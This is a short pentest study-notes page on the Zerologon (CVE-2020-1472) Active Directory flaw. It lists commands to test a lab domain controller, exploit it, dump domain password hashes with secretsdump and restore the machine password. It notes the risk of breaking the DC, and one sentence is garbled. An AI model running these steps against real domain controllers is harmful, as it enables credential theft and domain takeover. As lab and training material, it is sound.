// notes/ Active Directory
🏛️

Critical Active Directory CVEs Zerologon

The Zerologon vulnerability allows for attackers to manipulate authentication mechanisms in Microsoft’s Active Directory Netlogon Remote Protocol and compromise the Domain Control…

#active directory#adot8
source · oscp.adot8.com · active-directory/critical-active-directory-cves_zerologon

Zerologon

Overview

The Zerologon vulnerability allows for attackers to manipulate authentication mechanisms in Microsoft’s Active Directory Netlogon Remote Protocol and compromise the Domain Controller.

We are essentially the Domain Controller authentication to null so we can authenticate without a password.

{% hint style="danger" %} This vulnerability can BREAK the Domain Controller so exploiting it in a real engagement shouldn't be done {% endhint %}

Now here's how to do it :D

Zerologon Attack

First check if the Domain Controller is vulnerable with this script

bash
$./zerologon_tester.py PNPT-DC 192.168.1.129

Exploit the vulnerability with this script then dump hashes

bash
$python3 cve-2020-1472-exploit.py PNPT-DC 192.168.1.129
$imapcket-secretsdump -just-dc PNPT/PNPT-DC\$@192.168.1.129

Restore Domain Controller back to normal

bash
$python3 restorepassword.py PNPT/PNPT-DC@PNPT-DC -target-ip 192.168.1.129 -hexpass XXX
<figure><img src="/files/a73tAYr1ODHPNQJn82K3" alt=""><figcaption><p>hex value needed to restore the Domain Controller</p></figcaption></figure>